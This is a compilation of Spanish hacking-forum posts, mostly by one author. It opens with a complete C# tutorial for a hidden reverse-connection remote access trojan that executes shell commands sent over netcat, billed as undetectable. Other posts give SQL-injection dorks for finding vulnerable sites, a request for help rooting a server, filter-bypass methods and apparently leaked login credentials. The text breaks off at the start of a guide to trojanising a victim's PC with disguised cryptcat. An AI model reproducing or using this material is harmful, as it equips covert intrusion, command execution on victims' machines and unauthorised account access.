Temas

[comando]

En este tuto voy a enseñar como crear el principio de un RAT de conexion inversa.

En mi caso usaré visual studio ultimate 2012 pero obviamente puede utilizar algun otro IDE.

***************Creando el Servidor*************


Crearemos un servidor muy simple que lo que hará será esperar a que el cliente se conecte esto será mediante un ciclo infinito con una pausa del tiempo que nosotros indiquémos
Abrimos vs y creamos un nuevo proyecto de winform, y dos  clases con el nombre que querámos en mi caso el nombre dle proyecto es Server, clase Servidor y Utilidades:



Primero escribiremos la clase servidor

agregamos los NameSpaces que necesitamos, en este caso solo agregarémos 3:

Código [Seleccionar] Expandir

using System.IO; //Streams
using System.Net.Sockets; //tcpclient
using System.Threading; //Hilos


y nuestra clase quedará de la sig. manera:

Código [Seleccionar] Expandir

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO; //Streams
using System.Net; //IPAdress
using System.Net.Sockets; //tcpclient
using System.Threading; //Hilos

namespace Server
{
    public class Servidor
    {
//variables necesarias para conectarnos al cliente de manera inversa, ademas de escuchar los mensajes de este

        private string ip;
        private int port;
        private TcpClient tcpClient;
        private NetworkStream ns;
        private StreamReader sr;
        private StreamWriter sw;
        private StringBuilder sb;     
       

        public Servidor(string ip, int port)
        {
            this.ip = ip;
            this.port = port;
        }

        private enum mensajes
        {
            CD,
            Mensaje
        }


        public void iniciar(int tiempo)
        {
            EjecutarServidor();
            Thread.Sleep(tiempo);           
        }

        private void EjecutarServidor()
        {
            tcpClient = new TcpClient();
            sb = new StringBuilder();

            if (!tcpClient.Connected)
            {
                try
                {
                    tcpClient.Connect(ip, port);
                    ns = tcpClient.GetStream();
                    sr = new StreamReader(ns);
                    sw = new StreamWriter(ns);

                }
                catch (Exception)
                {
                    return;
                }

                for (; ; )
                {
                    try
                    {
                        sb.Append(sr.ReadLine());
                        LeerDatos(sb.ToString());
                        sb.Remove(0, sb.Length);
                    }
                    catch (Exception)
                    {
                        limpiar();
                        break;
                    }

                }
            }//fin del if 
        }//fin del metodo EjecutarServidor

        private void LeerDatos(string datos)
        {
            string[] cadena = datos.Split('$');

            if (String.Compare(cadena[0], mensajes.Mensaje.ToString()) == 0)
            {
                Utilidades.mandarMensaje(cadena[1]);
            }
        }//fin de LeerDatos

        private void limpiar()
        {
            sr.Close();
            sw.Close();
            ns.Close();
        }//fin de limpiar
    }//fin clase servidor
}



Aquí he creado las variables que necesitamos para conectarnos al cliente, esto es la ip y el puerto (esto se hace en el constructor) ademas de un StreamReader que usarémos para escuchar los mensajes que el cliente escriba.

Usé una variable del tipo enum, esto es para validar los mensajes del cliente, esto lo hacemos de la sig forma:

si el cliente escribe por ejemplo  "MandarMensaje" el servidor compara ese mensaje con el enum y si son iguales entonces va a realizar alguna tarea que escribamos en la clase Utilidades.

En el metodo iniciar hemos creado un bucle donde se ejecutará el metodo EjecutarServidor y ademas hará una pausa de x milisegundos.

El sig. metodo es el corazón del servidor, aqui intentarémos conectarnos y escucharémos los mensajes que el cliente nos pase

Los mensajes los validaremos en el metodo LeerDatos donde mandarémos como parametros el mensaje que el cliente escriba

Aquí mediante un string.compare() validamos si el mensaje es igual a lo que esperámos y si es así entonces ejecutarémos lo que haya en Utilidades
además usamos un split para seprar el mensaje del cliente, mas adelante con un ejemplo mostraré lo que realmente hace

el ultimo metodo es limpiar, aqui cerrarémos los streams.

ahora en la clase Utilidades, vamos a indicarle que sea estatica para no tener que instanciarla cada vez que la querámos utilizar

aqui simplemente se ejecuta un MessageBox.Show con el mensaje que el cliente haya escrito.

***************Usando la clase*************

ahora solo nos queda irnos al form y en el evento load de nuestro form y escribimos lo sig:

crearemos dos variables

Código [Seleccionar] Expandir

private Servidor servidor;
        private int tiempoRecon;

en el contructor las asignarémos:

Código [Seleccionar] Expandir

servidor = new Servidor("127.0.0.1", 9999);
            tiempoRecon = 5000;

y el el evento load ejecutarémos nuestra clase:

Código [Seleccionar] Expandir

private void Form1_Load(object sender, EventArgs e)
        {
            this.Hide();
            for (; ; )
            {
                servidor.iniciar(tiempoRecon);
            }
        }


el codigo completo es el sig:

Código [Seleccionar] Expandir

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Server
{
    public partial class Form1 : Form
    {
        private Servidor servidor;
        private int tiempoRecon;

        public Form1()
        {
            InitializeComponent();
            servidor = new Servidor("127.0.0.1", 9999);
            tiempoRecon = 5000;
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            this.Hide();
            for (; ; )
            {
                servidor.iniciar(tiempoRecon);
            }
        }
    }
}


***************Usar Netcat o Cryptcat como cliente*************

Como mandar los mensajes de un cliente.

bueno es muy facil podemos crear otra aplicación pero en este caso usarémos al viejo netcat o cryptcar

lo colocámos en c:\ y abrimos linea de comandos:

Código [Seleccionar] Expandir

nc.exe -lvp 9999


ejecutamos nuestro servidor y verémos como estámos conectados

ahora solo escribirémos lo sig:

Mensaje$HolaDesdeElCliente

y verémos como se abre el MessageBox del servidor con el mensaje HolaDesdeElCliente

el mensaje del cliente como dije antes se valida en el metodo LeerDatos(string datos)


donde el parametro datos en este caso va a ser igual a "Mensaje$HolaDesdeElCliente"
y mediante el metodo string.split() vamos a separar en un arreglo todo el mensaje que haya antes del signo "$" y todo lo que haya despues
en este caso quedará asi:

Código [Seleccionar] Expandir

string[] cadena = datos.Split('$');

siendo:
cadena[0] //Mensaje
y
cadena[1] //HolaDesdeElCliente

si escribimos cualquier otra cosa verémos que nuestro servidor no hace absolutamente nada.

pero bueno ya con ese estoy seguro que se les ocurrirá muchas cosas

bueno ahora verémos como hacerlo a la inversa (del servidor al cliente)

un ejemplo extremandamente sencillo será mandar un mensaje de Bienvenida una vez que el cliente se conecte

esto lo haremos simplemnete usando el metodo writeline de nuestro StreamWriter

solamente agregruen los sig. despues de que tcpclient se conecte:

Código [Seleccionar] Expandir

sw.WriteLine("Hola");
sw.Flush();

con eso mandamos un mensaje mediante writeline y mediante flush borramos todos los búferes

una vez sabiendo esto es facil deducir lo que podemos hacer por ejemplo sería creando otra validacion en nuestro metodo LeerDatos

quedaría de la sig forma en pseudocdigo:

Código [Seleccionar] Expandir

si el mensaje del cliente es igual a "dameIP" entonces
ejecutamos el metodo Utilidades.obtenerIP

y ese resultado lo mandamos mendiante writeline

como ven es muy facil crear un troyano simple.

ahora les voy a enseñar como mandar comandos cmd a nuestro servidor


agregamos un valor a la variable enum mensajes en mi caso quedó así:

Código [Seleccionar] Expandir

private enum mensajes
        {
            CD,
            Mensaje,
            comando
        }


y validamos el mensaje en el metodo LeerDatos

Código [Seleccionar] Expandir

if (String.Compare(cadena[0], mensajes.comando.ToString()) == 0)
            {
                Utilidades.consola(cadena[1]);
            }



agregamos el sig. namespace en nuestra clase utilidades:

Código [Seleccionar] Expandir

using System.Diagnostics;

y creamos el sig metodo en la clase Utilidades

Código [Seleccionar] Expandir

public static void consola(string comando)
        {
            Process cmd = new Process();
            cmd.StartInfo.FileName = "cmd.exe";
            cmd.StartInfo.RedirectStandardInput =
            true;
            cmd.StartInfo.RedirectStandardOutput =
            true;
            cmd.StartInfo.CreateNoWindow = true;
            cmd.StartInfo.UseShellExecute = false;
            cmd.Start();           

            cmd.StandardInput.WriteLine(comando);
            cmd.StandardInput.Flush();
            cmd.StandardInput.Close();
        }


y listo, ahora ejecutamos el servidor, abrimos netcat y mandamos mensaje de la siguiente forma:
comando$md pruebaaaaaa

donde comando es el mensaje que va a validar en LeerDatos
$ es simbola para separar
y md prueba es el comando (crear carpeta pruebaaaaa)

como ven es extremadamente sencillo

ya con esto hemos hecho un RAT funcional y lo mejor de todo FUD

Devilboy

Ojala les guste.

Coded en C#

probado en windows 7, 8 y 81 en 32 y 64 bit

Código [Seleccionar] Expandir

https://drive.google.com/file/d/0B55R3pNOtd8lR1RXcFUyZ3hqM2c/edit?usp=sharing

Ojala lo disfruten tanto como yo he disfrutado codeandolo xD

digamos que tengo el cliente de un rat y quiero que el mismo cliente me cree el servidor.

Como se podría hacer esto???

cual de estas dos es mejor?

AMD Radeon™ HD 7870 2GB GDDR5

ó

1GB GDDR5 NVIDIA® GeForce® GTX 555

ó

NVIDIA® GeForce® GT 640 1GB GDDR5

me urge por favor

Cuantas veces nos encontrámos dentro de una red donde tenga bloqueado youtube, facebook, twitter, etc.

Bueno aqúi les traigo unos metodos para poder saltarnos estas restricciones.

-------[[PROXYS]]-----

Muchos de nosotros sabemos que son y para que sirven pero veamos los que nos dice la Wiki:

Un proxy, en una red informática, es un programa o dispositivo que realiza una acción en representación de otro, esto es, si una hipotética máquina A solicita un recurso a una C, lo hará mediante una petición a B; C entonces no sabrá que la petición procedió originalmente de A. Su finalidad más habitual es la de servidor proxy, que sirve para interceptar las conexiones de red que un cliente hace a un servidor de destino, por varios motivos posibles como seguridad, rendimiento, anonimato, etc.

Teniendo mas claro en concepto dejaré algunas paginas que ofrecen este servicio:

http://hidemyass.com/proxy-list/
http://dtunnel.com
http://www.tubeoxy.com
http://www.kproxy.biz/
http://atunnel.com/
http://www.proxy4free.com/list/webproxy1.html

https://ssl-proxy.my-addr.com/  -------> Este es mi preferido ya que funciona sobre ssl

Existen muuuuchas mas pero solo pondré esas pocas ademas el uso de estas paginas no es totalmente de mi agrado ya que son bastante lentas.

-------[[ULTRASURF]]-----

Muchos dirán, ¿pero si ese es tambien un proxy, xq lo pones separado?

Bueno la respuesta es sí, si es un proxy pero yo creo que se ha ganado su propio espacio ya que me parece estupendo.
Se preguntarán como se usa, bueno es muy simple.
Lo unico que tenemos que hacer es bajarlo de la pagina oficial y sin necesidad de instalarlo solo damos doble click y este programa buscará el proxy mas cercano y nos conectarémos a este.

Si necesitan mas info aqui les dejo la pagina oficial donde podrán ver de que se trata ademas de descargarlo.

http://ultrasurf.us/

-------[[VPN]]-----

Segun la wiki:

Una red privada virtual, RPV, o VPN de las siglas en inglés de Virtual Private Network, es una tecnología de red que permite una extensión de la red local sobre una red pública o no controlada.

Ejemplos comunes son la posibilidad de conectar dos o más sucursales de una empresa utilizando como vínculo Internet, permitir a los miembros del equipo de soporte técnico la conexión desde su casa al centro de cómputo, o que un usuario pueda acceder a su equipo doméstico desde un sitio remoto, como por ejemplo un hotel. Todo ello utilizando la infraestructura de Internet.

En pocas palabras, es como si nos conectaramos a otra red dentro de nuestra misma red.

les pondré un ejemplo para que quede mas claro.

Nos encontramos conectados a las red A, pero la red A cuenta con filtros para bloquearnos youtube, fb, etc.
Entonces nos conectamos a la red B que es una red "limpia" sin bloqueos, asi que desde nuestra red A conectada a la red B tenemos acceso libre a cualquier pagina.

Como no todo puede ser maravilloso nos encontrámos con unos problemitas y estos son que las vpn no son gratuitas.
Existen algunas que lo son, pero tienen la condición de que duran muy poco o solo la podemos usar por cierta cantidad de Mb.

Les dejaré la lista de algunas VPN´s gratuitas:

http://www.tunnelbear.com/   vpn gratuita que solo se instala y te deja usar 100mb por mes, al termino del mes te da de nuevo los 100mb.
http://openvpn.net/   me parece que tambien te da 100mb por cada cuenta que creemos
http://cyberghostvpn.com/ otra vpn gratis, me parece que está no tiene reestricciones pero no me gustó xq me sacaba a cada rato.

http://www.xpdo.net/  -------> Mi preferida ya que sin instalar nada tendrémos una vpn gratis y rapida.
http://www.xpdo.net/setup_win7.html    esta es la pagina que enseña como configurarla.
el unico pero que tiene es que la contraseña cambia cada 30 minutos, pero es tan facil como volver a conectarnos, cambia el pass y listo.


-------[[TUNEL SSH]]-----

Guardé lo mejor para el final.

Segun la wiki:

Túnel SSH

El protocolo SSH (secure shell) se utiliza con frecuencia para tunelizar tráfico confidencial sobre Internet de una manera segura. Por ejemplo, un servidor de ficheros puede compartir archivos usando el protocolo SMB (Server Message Block), cuyos datos no viajan cifrados. Esto permitiría que una tercera parte, que tuviera acceso a la conexión (algo posible si las comunicaciones se realizan en Internet) pudiera examinar a conciencia el contenido de cada fichero trasmitido.

Para poder montar el sistema de archivo de forma segura, se establece una conexión mediante un túnel SSH que encamina todo el tráfico SMB al servidor de archivos dentro de una conexión cifrada SSH. Aunque el protocolo SMB sigue siendo inseguro, al viajar dentro de una conexión cifrada se impide el acceso al mismo.

Por ejemplo, para conectar con un servidor web de forma segura, utilizando SSH, haríamos que el cliente web, en vez de conectarse al servidor directamente, se conecte a un cliente SSH. El cliente SSH se conectaría con el servidor tunelizado, el cual a su vez se conectaría con el servidor web final. Lo atractivo de este sistema es que hemos añadido una capa de cifrado sin necesidad de alterar ni el cliente ni el servidor web.

Pondré un ejemplo para entender mejor como funciona esto:

Existen paginas donde ofrecen el uso de una consola con GNU/Linux.
Se preguntarán para que, bueno simplemente para que las personas aprendámos el uso de este.

La verdad es que me parece espectacular este servicio, xq creanme que se aprende mucho, ya que tenemos el poder de una consola con GNU/Linux desde cualquier computadora o dispositivo movil.

Lo primero que tenemos que hacer es conseguir una cuenta y mediante el uso de putty (cliente ssh) creamos el tunel y una vez configurado nuestro navegador tendrémos libre acceso en internet.

Existen muchas paginas web que ofrecen este servicio mediante una cuota mensual, otros anual pero tambien existen los gratuitos.

Pondré la lista de estos

http://hypeshell.com/ Excelente solo que cobra creo que 5 Euros al año
https://camolist.com/ Otra excelente solo que mas cara.

http://shellmix.com/index.php/free-account/free-shell-account    ---------> Mi favorita ya que es totalmente gratuita


Ademas otra punto exclenete es que podemos configurar la pc de nuestra casa, creando un servidor ssh y asi conectarnos a nuestra casa desde la red bloqueada.

Les dejo este tuto que hice hace tiempo sobre como crear un servidor ssh en nuestra pc y por si quieren las de la red tambien viene en la pagina 6 como configurar el putty para hacerlo.

http://www.mediafire.com/view/?aoh3fwjts5ccxnf

Tambien les dejo este enlace donde enseña como configurar el navegador, solo recuerden usar su cuenta

https://camolist.com/sshtunnel/windows/

Aclaro que no son las únicas, existen muchas mas gratis, solo es cuestión de buscarlas

Cualquier duda con gusto les ayudaré

salu2

alguno sabe como rootear este servidor windows???


Software: Microsoft-IIS/7.5. PHP/5.3.6

uname -a: Windows NT NTC22 6.1 build 7601 (Unknow Windows version Standard Edition Service Pack 1)
i586



les agradeceré mucho su ayuda


salu2

bueno hace tiempo la sacaba con este programa

http://www.nirsoft.net/utils/product_cd_key_viewer.html

pero enmi trabajo me la formatearon y ahora no la saca



alguna idea??

he probado otros programas y me muestran esto

BBBBB-BBBBB-BBBBB-BBBBB-BBBBB

ah y es el windows 7 professional sp1

¿Que es OpenFire?

Bueno esta herramientas nos permite crear un webservice para poder chatear dentro de nuestra lan o via remota.

Pero lo mejor de todo es que es gratis, facil de usar y de codigo abierto.

Bueno aki les dejo el videotuto que acabo de crear, espero les guste

http://www.mediafire.com/?k3bwar1aq4c69tk


Nota: que alguno mod lo mueva a manuales o algo asi, xq a mi no me deja crear nuevos temas

Un tuto que acabo de hacer sobre crear un autocomplete dinamico.

aki una imagen sacada de la web de jquery



espero les guste

http://www.mediafire.com/?ee8pwfsingxyq96


salu2

[STORED PROCEDURES]

STORED PROCEDURES

Bueno en este tutorial intentaré explicar que es un Procedimiento Almacenado.

Definición.

Según la wiki:
Un procedimiento almacenado (stored procedure en inglés) es un programa (o procedimiento) el cual es almacenado físicamente en una base de datos. Su implementación varía de un gestor de bases de datos a otro. La ventaja de un procedimiento almacenado es que al ser ejecutado, en respuesta a una petición de usuario, es ejecutado directamente en el motor de bases de datos, el cual usualmente corre en un servidor separado. Como tal, posee acceso directo a los datos que necesita manipular y sólo necesita enviar sus resultados de regreso al usuario, deshaciéndose de la sobrecarga resultante de comunicar grandes cantidades de datos salientes y entrantes.
Usos típicos para procedimientos almacenados incluyen la validación de datos siendo integrados a la estructura de base de datos (los procedimientos almacenados utilizados para este propósito a menudo son llamados disparadores; triggers en inglés), o encapsular un proceso grande y complejo. El último ejemplo generalmente ejecutará más rápido como un procedimiento almacenado que de haber sido implementado como, por ejemplo, un programa corriendo en el sistema cliente y comunicándose con la base de datos mediante el envío de consultas SQL y recibiendo sus resultados.
Los procedimientos pueden ser ventajosos: Cuando una base de datos es manipulada desde muchos programas externos. Al incluir la lógica de la aplicación en la base de datos utilizando procedimientos almacenados, la necesidad de embeber la misma lógica en todos los programas que acceden a los datos es reducida. Esto puede simplificar la creación y, particularmente, el mantenimiento de los programas involucrados.

Podemos ver un claro ejemplo de estos procedimientos cuando requerimos realizar una misma operación en un servidor dentro de algunas o todas las bases de datos y a la vez dentro de todas o algunas de las tablas de las bases de datos del mismo. Para ello podemos utilizar a los Procedimientos almacenados auto creables que es una forma de generar ciclos redundantes a través de los procedimientos almacenados.

En pocas palabras un stored procedure (SP) es un programa (script) con sentencias sql que se ejecuta en la base de datos.
Para que tengan otra idea de lo que es,  imaginemos una función o método en programación.

Creando nuestro primer Stored Procedure (SP)

Antes de otra cosa creemos una nueva base de datos para hacer nuestros ejercicios:

Código [Seleccionar] Expandir

Create database sp;
Use sp;
CREATE TABLE alumnos (idAlumno INT NOT NULL PRIMARY KEY AUTO_INCREMENT, nombre VARCHAR(50), apellido VARCHAR(30));
CREATE TABLE profesores (idProfesor INT NOT NULL PRIMARY KEY AUTO_INCREMENT, nombre VARCHAR(50), apellido VARCHAR(30));
INSERT INTO alumnos VALUES('','pepe','pecas');
INSERT INTO alumnos VALUES('','juan','el toro');
INSERT INTO profesores VALUES('','juan','alejandro');
INSERT INTO profesores VALUES('','carlos','perez');

Lo que hicimos fue crear una base de datos llamada SP y creamos dos tablas llamas alumnos y profesores con solo 3 campos: id, nombre y apellido.
Además ingresamos 2 usuarios a la tabla alumnos y profesores.
Ahora creáremos nuestro primer SP:

Código [Seleccionar] Expandir

DELIMITER//
CREATE PROCEDURE listar()
BEGIN
SELECT * FROM alumnos;
END//
DELIMITER;

Delimiter// nos sirve para cambiar la forma de terminación de nuestras sentencias SQL  de; por //
Esto nos sirve por si tenemos más de una sentencia SQL en nuestro SP
La siguiente línea sirve para crear y darle nombre a nuestro SP, en este caso el nuestro se llama listar y necesita llevar paréntesis ().
Con la palabra reservada BEGIN le indicamos donde inicia y con END donde termina nuestro SP.
Todas las sentencias SQL se deben de hacer dentro de este bloque y deben de ir finalizadas por;
En este caso solo mostramos todos los registros de la tabla alumnos.
La palabra END debe de finalizar con el delimitador que establecimos con anterioridad, aquí se puede usar el que queramos por ejemplo $$, etc.

Y en la última línea regresamos el delimitador de // por;
Ya tenemos creado nuestro primer SP, ahora para usarlo escribimos lo siguiente:

CALL nombre_del_sp();

En este caso quedaría así:

Código [Seleccionar] Expandir

CALL listar();

Y nos mostrará todos los registros de la tabla alumnos.

USO DE PARAMETROS

Veamos otro ejemplo con el mismo SP pero pasándole parámetros.
Los parámetros sirven para hacer más flexible y útil a los SP.

Existen 3 tipos de parámetros:

IN: Que son los parámetros de entrada, sirven para ingresar información  (La palabra IN es por defecto, así que si la omitimos no pasa nada).
OUT: Parámetros de salida, sirven para extraer información
INOUT: Muy obvio creo...

PARAMETROS IN (ENTRADA)

Código [Seleccionar] Expandir

DELIMITER//
CREATE PROCEDURE listarNombre(nombreAlumno  varchar(20))
BEGIN
SELECT * FROM alumnos where nombre = nombreAlumno;
END//

Con esto pasamos un parámetro IN a nuestro SP,  donde nos va a seleccionar todos los registros de la tabla alumnos donde nombre sea igual al parámetro.
CALL listarNombre('pepe');

PARAMETROS OUT (SALIDA)

Veamos un ejemplo para entenderlo mejor

Código [Seleccionar] Expandir

DELIMITER $$

CREATE PROCEDURE salida(id INT,OUT nombreAlumno VARCHAR(20))
BEGIN
SELECT nombre FROM alumnos WHERE idAlumno = id INTO nombreAlumno ;
END$$
DELIMITER ;

Y para llamarlo usamos:

Código [Seleccionar] Expandir

CALL salida(2,@nombre);

Bueno y si se dan cuenta no pasa nada, no muestra el registro, lo que pasa es que hace falta mostrarlo y para eso usamos lo siguiente:

Código [Seleccionar] Expandir

SELECT @nombre;

Aquí lo que hicimos fue pasarle un parámetro de entrada (IN) y regresar el resultado a la variable nombreAlumno(OUT).
Esto es muy parecido a lo que hacemos al programar, cuando creamos una función o método y usamos la palabra reservada return para regresar el resultado o un valor.

PARAMETRO ENTRADA-SALIDA (INOUT)

Código [Seleccionar] Expandir

DELIMITER $$
CREATE PROCEDURE entradaSalida(INOUT variable VARCHAR(20))
BEGIN
SELECT nombre FROM alumnos WHERE idAlumno = variable INTO variable;
END$$
DELIMITER ;


En este ejemplo solo usamos una variable para asignar un valor y extraer el resultado.
Ahora ¿cómo lo ejecutamos?

Código [Seleccionar] Expandir

SET @nombre = 2;
CALL salida(@nombre);
SELECT @nombre;

VARIABLES EN SP

Así como cuando programamos usamos variables, pues en los SP también se usan.
Pongamos un ejemplo muy sencillo.

Código [Seleccionar] Expandir

DELIMITER $$
CREATE PROCEDURE variable()
    BEGIN   
DECLARE id INT;
SET id = 1;
SELECT * FROM alumnos WHERE idAlumno = id;
    END$$
DELIMITER ;

Usando Declare asignamos el nombre y tipo de la variable y con set asignamos un valor a nuestra variable.
También es posible declarar e inicializar una variable de la siguiente forma:

Código [Seleccionar] Expandir

DECLARE id INT DEFAULT 1;

Probamos nuestro SP hacienda un llamado a variable:

Código [Seleccionar] Expandir

CALL variable();

Bueno con esto termino la primera parte.

Espero les guste y les sirva

Dejo un archivo por si lo quieren descargar

http://www.mediafire.com/?7am7yur420wo29s

salu2

Devilboy

Usa tu PC con windows 7 como Hotspot.





Un ejemplo:

Devilboy tiene una pc con modem 3G y sus amigos no tienen internet.

Devilboy instala el programa y crea un hotspot

Sus amigos tienen internet

Otro ejemplo:

Devilboy tiene en su trabajo una PC con internet

Devilboy no puede conectar su iphone a la red xq tiene un filtrado mac.

El Devil instala el programa en su PC.

Devil conecta su iphone al hotspot y consigue internet

Pagina Oficial:

http://www.connectify.me/

[Esenario:]

Esenario:

Trabajo o escuela con varias paginas bloqueadas (megaupload, youtube, facebook, etc).

Requisitos:

Una cuenta shell gratis.
Para esto podémos usar dos opciones
1) Un servidor ssh creado en nuestra pc (en otro tuto ya expliqué como lograr esto).

http://foro.elhacker.net/tutoriales_documentacion/crear_tunel_ssh_en_windows-t314865.0.html

2) Un servidor ssh conectado a la nube (opción recomendada)

Bueno yo recomiendo la dos ya que de la primera forma habría que dejar nuestra pc encendida y con la opción 2 pues solo nos conectamos a un servidor.

Tambien necesitámos un cliente ssh

usarémos Putty
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

Muestra:

Sin Proxy



Verificamos nuestra ip publica:

www.whatismyip.com




Bien ahora vamos a acceder a nuestro servidor ssh desde putty



1) En la pestaña sessions pondrémos la url de nuestro servidor y el puerto por defecto es 22, a menos que les den otro o que ustedes configuren cualquier otro.

2) Damos click en la pestaña SSH-tunnels.
escribimos el puerto, puede ser el que gusten en mi caso usaré el 5151
seleccionamos Dinamic y para finalizar add



4) Podémos guardar la configuracion para no hacer lo mismo para ves querámos crear el tunel.

5)

Nos logeamos con nuestro user y pass




6)Configurar los navegadores

Firefox:

Click en la pestaña Herramientas-Opciones

Avanzado-red-configuracion



y dejamos esta pantalla justo como muestra la imagen

-configuracion manual de proxy
  -servidor SOCKS: 127.0.0.1 Puerto: 5151 (o el que hayan usado)



Muestra
Con Proxy:



Verificamos de nuevo nuestra ip:

www.whatismyip



Espero les guste

Este metodo se puede usar para bypassear websense u otros filtros de seguridad en las redes

salu2

Devilboy

primero se incluye este namespace

Código (csharp) [Seleccionar] Expandir

using System.Net.Mail;

y dentro de un boton por ejemplo se escribe esto:

Código (csharp) [Seleccionar] Expandir

           MailMessage correo = new MailMessage();
           correo.From = new MailAddress("Tu_correo");
           correo.To.Add("E-mail_destinatario");
           correo.Subject = "Prueba";
           correo.Body = "prueba de correo";
         
           SmtpClient cliente = new SmtpClient("smtp.gmail.com");
           cliente.Port = 587;
           cliente.Credentials = new System.Net.NetworkCredential("Tu_correo_gmail", "Tu_password");
           cliente.EnableSsl = true;
           cliente.Send(correo);


adema puede kedar mucho mas lindo si usamos un formulario windows y cambiamos los datos por campos de texto


ademas si se agrega esto:

Código (csharp) [Seleccionar] Expandir

correo.IsBodyHtml = true;

en el cuerpo del mensaje podemos agregar html


y para finalizar con estas lineas podemos adjuntar un archivo:

Código [Seleccionar] Expandir

           Attachment adjuntos = new Attachment("ruta_de_nuestro_archivo/carta.txt");
           correo.Attachments.Add(adjuntos);

espero les guste

Disfrutenlas

login : alhawsani
pass : alkumi11

login : wackus
pass : bootie

Bueno un tuto que acabo de hacer para crear un servidor SSH en Windows y poder acceder a nuesrtro ordenador de forma remota mediante la linea de comandos.

Tal ves se preguntarán ¿y para que me sirve eso si existen programas como VNC u otros donde puedo hacerlo de forma grafica?
Bueno la diferencia es que SSH es un protocolo con alta seguridad, asi que no se deben de preocupar por atakes como MIM man in the middle.

Espero que les guste y si es así el proximo será sobre Linux

http://ns2.elhacker.net/Como_crear_un_t__nel_entre_dos_PC.pdf

Que lo disfruten

Devilboy

Bueno ya tenia tiempo que no hacia un videotuto, pero espero que les guste y no lo usen para defacear ya que estoy totalmente en contra del deface.

Bueno eso ya depende de uds xD

aki les dejo el video

http://uploadmirrors.com/download/KQSKNAIU/sqli2.avi.zip

tambien les dejo el programa Havij

http://www.itsecteam.com/en/projects/project1_page2.htm

http://www.megaupload.com/?d=9OTMOJP2

y aki les dejo los dorks que pueden usar para encontrar webs vulnerables a sqli

Código [Seleccionar] Expandir

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Aki un video tuto que hice.

una vez teniendo shell podemos subir y bajarnos archivos

espero les guste

http://rapidshare.com/files/55768206/subir_y_bajar.zip.html

saludos

Devilboy

weno, les enseñaré como obtener shell con netcat o cryptcat y de este modo poder troyanisar la pc victima, a la que podamos subir y bajar archivos hasta abrir la lectora del cd aparte de muchas cosas mas ^^.

pero eso ya es cosa de la imaginación de cada uno

En lo personal prefiero Cryptcat ya que es exactamente lo mismo que netcat solo que mas seguro

para este metodo necesitamos lo siguiente:
1.-Cryptcat
2.-Winrar
3.-Nircmd
4.- Alguna foto, juego o alguna otra cosa para no levnatar sospecha
5.- Un pekeño script en visual basic y batch

Bien, manos a la obra
